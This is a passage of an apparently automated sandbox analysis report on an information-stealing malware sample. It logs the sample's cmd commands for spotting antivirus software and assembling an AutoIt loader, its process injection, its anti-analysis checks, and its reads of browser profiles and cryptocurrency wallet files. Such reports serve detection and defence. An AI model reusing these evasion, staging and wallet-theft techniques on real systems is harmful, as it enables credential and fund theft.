                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\407310\
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\407310
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\
                      Source: Web Data.25.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
                      Source: Web Data.25.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
                      Source: Web Data.25.drBinary or memory string: tasks.office.comVMware20,11696503903o
                      Source: Web Data.25.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
                      Source: svchost.exe, 0000000F.00000003.1829154317.000001C2785AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkmbolicLinkSymbolicLink
                      Source: svchost.exe, 0000000F.00000003.1829154317.000001C2785AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkLinkcLinkSymbolicLink
                      Source: Web Data.25.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
                      Source: Web Data.25.drBinary or memory string: www.interactivebrokers.comVMware20,11696503903}
                      Source: Web Data.25.drBinary or memory string: microsoft.visualstudio.comVMware20,11696503903x
                      Source: Web Data.25.drBinary or memory string: trackpan.utiitsl.comVMware20,11696503903h
                      Source: Web Data.25.drBinary or memory string: bankofamerica.comVMware20,11696503903x
                      Source: svchost.exe, 0000000F.00000002.2231588431.000001C27625D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2231621187.000001C276274000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000023.00000002.2691355838.0000021AB318B000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000024.00000002.2691736483.000001F269D6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: wmplayer.exe, 00000023.00000002.2691355838.0000021AB318B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWf
                      Source: Web Data.25.drBinary or memory string: Interactive Brokers - HKVMware20,11696503903]
                      Source: Web Data.25.drBinary or memory string: global block list test formVMware20,11696503903
                      Source: Web Data.25.drBinary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
                      Source: Web Data.25.drBinary or memory string: ms.portal.azure.comVMware20,11696503903
                      Source: Web Data.25.drBinary or memory string: interactivebrokers.comVMware20,11696503903
                      Source: Web Data.25.drBinary or memory string: account.microsoft.com/profileVMware20,11696503903u
                      Source: Web Data.25.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903
                      Source: Web Data.25.drBinary or memory string: AMC password management pageVMware20,11696503903
                      Source: Web Data.25.drBinary or memory string: turbotax.intuit.comVMware20,11696503903t
                      Source: dllhost.exe, 00000024.00000002.2691736483.000001F269D6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                      Source: Web Data.25.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903}
                      Source: chrome.exe, 00000013.00000002.1869550958.0000023A36EDF000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000016.00000002.1896863064.000001E250044000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: svchost.exe, 0000000F.00000002.2231464377.000001C276243000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@~(v
                      Source: Web Data.25.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903x
                      Source: Web Data.25.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
                      Source: Web Data.25.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
                      Source: Web Data.25.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
                      Source: Web Data.25.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
                      Source: Web Data.25.drBinary or memory string: outlook.office365.comVMware20,11696503903t
                      Source: Web Data.25.drBinary or memory string: outlook.office.comVMware20,11696503903s
                      Source: Web Data.25.drBinary or memory string: netportal.hdfcbank.comVMware20,11696503903
                      Source: svchost.exe, 0000000F.00000003.1675987126.000001C2782E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                      Source: svchost.exe, 0000000F.00000003.1675987126.000001C2782E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                      Source: Web Data.25.drBinary or memory string: interactivebrokers.co.inVMware20,11696503903d
                      Source: Web Data.25.drBinary or memory string: dev.azure.comVMware20,11696503903j
                      Source: Web Data.25.drBinary or memory string: discord.comVMware20,11696503903f
                      Source: Web Data.25.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696503903
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_000001C27831F5A0 rdtscp15_3_000001C27831F5A0
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C455A40 GetLastError,IsDebuggerPresent,OutputDebugStringW,12_2_00007FF68C455A40
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C4741A8 GetProcessHeap,12_2_00007FF68C4741A8
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C478E74 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00007FF68C478E74
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C46AD08 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00007FF68C46AD08
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C45566C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00007FF68C45566C
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C455850 SetUnhandledExceptionFilter,12_2_00007FF68C455850

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Program Files\Windows Media Player\wmplayer.exe Memory allocated: C:\Windows\System32\dllhost.exe base: 1F269C70000 protect: page read and write
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.com NtUnmapViewOfSection: Direct from: 0x7FF68C4AC4BD
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.com NtQuerySystemInformation: Direct from: 0x7FF68C4AC4AD
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.com NtClose: Direct from: 0x7FF68C4AC3CD
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.com NtDelayExecution: Direct from: 0x7FF68C4ADFD8
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.com NtProtectVirtualMemory: Direct from: 0x7FF68C46B26C
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.com NtQuerySystemInformation: Direct from: 0x7FF68C454924
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.com NtQuerySystemInformation: Direct from: 0x7FFEFE4E26A1
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.com NtProtectVirtualMemory: Direct from: 0x7FF68C4383B5
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.com NtQueryAttributesFile: Direct from: 0x7FF68C4AD642
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.com NtClose: Direct from: 0x7FF68C4AC5C7
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.com NtOpenFile: Direct from: 0x7FF68C4AC37B
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.com NtUnmapViewOfSection: Direct from: 0x7FF68C4AC508
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.com NtQueryInformationToken: Direct from: 0x7FF68C4C3508
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.com NtDelayExecution: Direct from: 0x7FF68C441C92
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.com NtProtectVirtualMemory: Direct from: 0x7FF68C458FF0
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.com Memory written: C:\Users\user\AppData\Local\Temp\407310\Hop.com base: 24366310000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.com Thread register set: target process: 4120
                      Source: C:\Program Files\Windows Media Player\wmplayer.exe Memory written: C:\Windows\System32\dllhost.exe base: 1F269C70000
                      Source: C:\Program Files\Windows Media Player\wmplayer.exe Memory written: C:\Windows\System32\dllhost.exe base: 7FF7782E14E0
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C433B64 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,12_2_00007FF68C433B64
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C454364 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,12_2_00007FF68C454364
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Ampland Ampland.cmd & Ampland.cmd
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 407310
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Tall + ..\Compensation + ..\Limited + ..\Pasta + ..\Patricia + ..\Mac + ..\Terminal + ..\Roommate + ..\Pts + ..\Andorra B
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\407310\Hop.com Hop.com B
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.com Process created: C:\Users\user\AppData\Local\Temp\407310\Hop.com C:\Users\user\AppData\Local\Temp\407310\Hop.com
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.com Process created: C:\Users\user\AppData\Local\Temp\407310\Hop.com C:\Users\user\AppData\Local\Temp\407310\Hop.com
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.com Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                      Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"
                      Source: C:\Program Files\Windows Media Player\wmplayer.exe Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C49DB9C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,12_2_00007FF68C49DB9C
                      Source: Hop.com, 0000000A.00000000.1481376099.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp, Hop.com, 0000000C.00000000.1600743468.00007FF68C508000.00000002.00000001.01000000.00000007.sdmp, Hop.com, 0000000E.00000000.1602862877.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                      Source: Hop.comBinary or memory string: Shell_TrayWnd
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C46FBB0 cpuid 12_2_00007FF68C46FBB0
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AB59B0 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,15_3_00007DF426AB59B0
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C46BD88 GetSystemTimeAsFileTime,12_2_00007FF68C46BD88
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C472290 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,12_2_00007FF68C472290
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: svchost.exe, 0000000F.00000002.2231737197.000001C276300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Wireshark.exe
                      Source: svchost.exe, 0000000F.00000002.2231737197.000001C276300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lordpe.exe
                      Source: svchost.exe, 0000000F.00000002.2231737197.000001C276300000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regmon.exe

                      Stealing of Sensitive Information

                      Source: Yara matchFile source: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000003.1667413757.00000243663E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.1670933123.000001C276180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: svchost.exe, 0000000F.00000003.2117817268.000001C2785ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Local\Qtum-Electrum\config
                      Source: svchost.exe, 0000000F.00000003.2117817268.000001C2785ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\config
                      Source: svchost.exe, 0000000F.00000003.1918863263.000001C2785AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %AppData%\com.liberty.jaxx
                      Source: svchost.exe, 0000000F.00000002.2231621187.000001C276274000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Local\Exodus\??\C:\Users\user\AppData\Roaming\Tox
                      Source: wmplayer.exe, 00000023.00000003.2136167380.0000021AB3215000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Host: HEADclosews:exodus.jsExodusatomic.jsAtomicguarda.jsGuardainfinity.jsInfinitycoinwallet.jsCoinWalletpassphrase.htmlindex.html#/entry/loginWeb Multi-currency Wallet | GuardaInfinityWalletCoin WalletwebSocketDebuggerUrltitle127.0.0.1http://127.0.0.1:%u/json/list?t=%u...*.*passphrase.jsonsecoatomic/Local Storage/leveldb/Coinomi/wallets/%s\Local Storage%s\IndexedDBacc.\Systemroot\system32\kernel32.dllcoinwallet/Local Storage/leveldb/Coin Wallet\Local Storage\leveldbCoin Wallet\Local Storage\leveldb\%LOCALAppData%\Exodus%AppData%\Exodus%LOCALAppData%\atomic\Local Storage\leveldb%AppData%\atomic\Local Storage\leveldb%LOCALAppData%\Coinomi\Coinomi\wallets%AppData%\Coinomi\Coinomi\wallets%LOCALAppData%\Guarda%AppData%\Guarda%LOCALAppData%\InfinityWallet%AppData%\InfinityWalletout of memoryI/O errorsocket closed by peerconnection failuressl not supportedhttpswshttp
                      Source: svchost.exe, 0000000F.00000002.2232565880.000001C2785FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Filenamexodus
                      Source: chrome.exe, 00000013.00000002.1876141419.0000422C00284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: GCMKeyStore
                      Source: svchost.exe, 0000000F.00000002.2231464377.000001C276213000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\jsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\IconsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons MaskableJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDBJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest ResourcesJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasmJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons MonochromeJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjbJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local StorageJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code CacheJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\bhsw2cld.default-release\safebrowsingJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\d5610d20-4a84-40b4-96b3-9660f248e6a5Jump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCacheJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfakJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncmJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\extJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session StorageJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\bhsw2cld.default-release\settings\main\ms-language-packsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldoomlJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\IconsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons MaskableJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\bhsw2cld.default-release\startupCacheJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cache2\entriesJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\bhsw2cld.default-release\settings\mainJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dirJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\bhsw2cld.default-release\safebrowsing\google4
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\bhsw2cld.default-release\thumbnails
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cache2
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome
